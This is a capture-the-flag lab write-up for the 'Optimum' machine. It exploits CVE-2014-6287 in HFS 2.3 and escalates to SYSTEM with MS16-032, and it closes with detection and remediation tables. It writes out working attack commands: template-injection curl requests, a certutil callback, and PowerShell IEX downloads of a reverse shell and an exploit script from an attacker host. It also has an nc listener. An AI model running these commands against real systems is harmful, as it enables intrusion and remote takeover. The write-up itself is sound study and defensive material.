Overview
Optimum exposes a single service: HttpFileServer (HFS) 2.3 by Rejetto on port 80. No other ports are open. The server runs on Windows Server 2012 R2 with 31 hotfixes, all from 2014. Over a decade of critical updates are missing.
HFS 2.3 is vulnerable to CVE-2014-6287, a remote code execution flaw in the
search parameter. A null byte terminates the search string, and subsequent
content is interpreted as HFS template directives. The {.exec|cmd.} directive
executes operating system commands as the kostas user. Privilege escalation
uses MS16-032, a race condition in the Windows Secondary Logon Service, but
requires navigating a 32-bit/64-bit architecture mismatch.
Reconnaissance
I scan all 65535 ports to ensure nothing is hidden:
nmap -sC -sV -p- --min-rate 5000 10.129.15.118| Port | Service | Product / Version | Notes |
|---|---|---|---|
| 80 | HTTP | HttpFileServer httpd 2.3 | Default HFS directory listing |
Only port 80 is open. No SSH, no RDP, no SMB. The attack surface is entirely the web service.
curl -sI http://10.129.15.118/
# Server: HFS 2.3
# Set-Cookie: HFS_SID_=0.208266498241574; path=/;The HFS web interface presents a file server with a built-in search function. No authentication is required to access the interface or search.
Attack Surface Analysis
HFS 2.3 implements a custom scripting language for template processing.
Directives like {.exec|command.} execute OS commands. The search parameter
flows through the template engine without sanitisation. This is CVE-2014-6287.
| Attribute | Value |
|---|---|
| CVE | CVE-2014-6287 |
| CVSS v3.1 | 9.8 (Critical) |
| CWE | CWE-94 (Code Injection) |
| Root cause | Null byte terminates search string; trailing content parsed as template directives |
| Affected | HFS 2.3 |
| MITRE ATT&CK | T1190 (Exploit Public-Facing Application) |
Vulnerability Analysis
The exploit URL format is: http://TARGET/?search=%00{.exec|COMMAND.}. The
%00 null byte terminates the search query from the application’s perspective,
but subsequent bytes still reach the template parser. The {.exec|...|}
directive is evaluated by HFS, executing the enclosed command via cmd.exe /c.
This is a textbook template injection. The application fails to separate data from code: user input intended as a search query is processed as executable template syntax.
Exploitation
Step 1: Confirm code execution
I use a certutil callback to validate that commands reach the operating system:
# Attacker: start HTTP listener
python3 -m http.server 8080
# Trigger HFS exec directive
curl -s "http://10.129.15.118/?search=%00{.exec|certutil+-urlcache+-split+-f+http://10.10.14.5:8080/ping.txt+C:\Users\kostas\ping.txt.}"
# Attacker HTTP server log:
# 10.129.15.118 - "GET /ping.txt HTTP/1.1" 404 -The 404 confirms the target made an outbound HTTP request. Code execution is confirmed.
Step 2: Obtain reverse shell
Complex PowerShell commands fail through the HFS template parser due to
special character handling. The solution is to host a PowerShell script and
download it with IEX:
# Host Nishang reverse shell script
python3 -m http.server 8080
# Trigger download and execution via 64-bit PowerShell
curl -s "http://10.129.15.118/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).DownloadString('http://10.10.14.5:8080/rev.ps1').}"nc -lnvp 4444
# Connection from 10.129.15.118:49267
# PS C:\Users\kostas\Desktop> whoami
# optimum\kostasThe SysNative path is critical. The HFS process runs as 32-bit under WoW64
on a 64-bit OS. Using SysNative invokes the native 64-bit PowerShell,
which is required for the MS16-032 exploit later.
Step 3: Privilege escalation with MS16-032
Post-exploitation enumeration reveals the situation:
whoami /priv
# SeChangeNotifyPrivilege Bypass traverse checking EnabledNo SeImpersonatePrivilege. Potato-family attacks are ruled out. With 31
hotfixes all from 2014 and KB3139914 (MS16-032 patch) absent, kernel
exploitation is the path forward.
MS16-032 exploits a race condition in the Secondary Logon Service
(seclogon). It requires two or more logical processors and a 64-bit
PowerShell context. The SYSTEM process spawned by the exploit cannot make
outbound network connections (Windows Firewall blocks them), so I use
icacls to grant file access instead of spawning a reverse shell:
# From 64-bit PowerShell
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5:8080/Invoke-MS16032.ps1'); Invoke-MS16032 -Command 'cmd /c icacls C:\Users\Administrator\Desktop /grant kostas:F /T'"
# [+] Windows 10 x64 with 2 logical processors
# [+] Token duplication succeeded
# [+] CreateProcessWithLogonW completedThe “Windows 10 x64” banner is hardcoded in the Empire script; the actual OS
is Server 2012 R2 as confirmed by systeminfo.
PS> type C:\Users\Administrator\Desktop\root.txt
[flag redacted]Post-Exploitation
Both flags captured. System enumeration confirms the patch deficit:
systeminfo
# OS Name: Microsoft Windows Server 2012 R2 Standard
# OS Version: 6.3.9600 N/A Build 9600
# System Type: x64-based PC
# Hotfix(s): 31 Hotfix(s) Installed.
# [01]: KB2938066
# ...
# [31]: KB3014442All 31 hotfixes date from 2014. The most recent is KB3014442. The system has received no updates for over a decade. KB3139914 (MS16-032 patch) is absent, as is every subsequent security update.
The kostas user is a standard account with no administrative group
membership. The entire escalation path depended on the missing patch and the
architecture mismatch requiring careful selection of the PowerShell binary.
An operational note on HFS reliability: the exec handler stops processing
new {.exec} directives after approximately 10 to 15 invocations. The
handler silently fails. Operational discipline dictates limiting to 3 commands
per engagement. If the handler degrades, the target VM must be reset.
In a production environment, the SYSTEM token could be used for credential extraction with Mimikatz, creation of new administrator accounts, or lateral movement to domain-joined machines.
Defensive Analysis
Detection opportunities
| Phase | MITRE ATT&CK | Detection |
|---|---|---|
| Initial access | T1190 | WAF rule matching %00{.exec in query strings |
| Execution | T1059.001 | PowerShell downloading and executing remote scripts |
| Priv escalation | T1068 | MS16-032: seclogon service creating processes with SYSTEM token |
| Persistence | T1222.001 | icacls modifying NTFS permissions on Administrator profile |
Network-level: The null byte followed by {.exec in HTTP query strings is
a distinctive signature. Any web application firewall blocking null bytes in
parameters would prevent this attack entirely.
Host-level: PowerShell IEX(New-Object Net.WebClient).DownloadString()
is one of the most commonly flagged patterns in endpoint detection. Script
block logging (introduced in PowerShell 5.0, available on this OS via update)
would capture the full payload.
Remediation
| Priority | Action | Effort | Impact |
|---|---|---|---|
| P0 | Remove HFS 2.3 or upgrade to a maintained file server | Low | Critical |
| P0 | Apply all Windows updates (system is 10+ years behind) | Medium | Critical |
| P1 | Deploy a WAF blocking null bytes in query parameters | Low | High |
| P1 | Enable PowerShell Constrained Language Mode | Low | High |
| P2 | Implement application whitelisting | Medium | Medium |
| P2 | Enable PowerShell script block logging | Low | Medium |
HFS 2.3 is abandonware. Rejetto released HFS 3.x as a complete rewrite, but the 2.x branch is unmaintained. The correct action is replacement, not upgrade.
Key Takeaways
-
Null byte injection is a recurring attack pattern. The null byte terminates strings in C-based parsers but not in higher-level template engines. Any application that processes user input through multiple parsing layers with different null byte semantics is a candidate for this class of vulnerability.
-
Architecture mismatches complicate exploitation and detection. The 32-bit HFS process running on a 64-bit OS meant kernel exploits had to be launched from a specific PowerShell path. Defenders should monitor for processes accessing
C:\Windows\Sysnativeas this is often a sign of WoW64 exploitation. -
Network isolation limits post-exploitation options. Windows Firewall blocking outbound connections from the SYSTEM process forced a different approach (NTFS permission modification instead of reverse shell). This is a useful defensive control, but it does not prevent the escalation itself.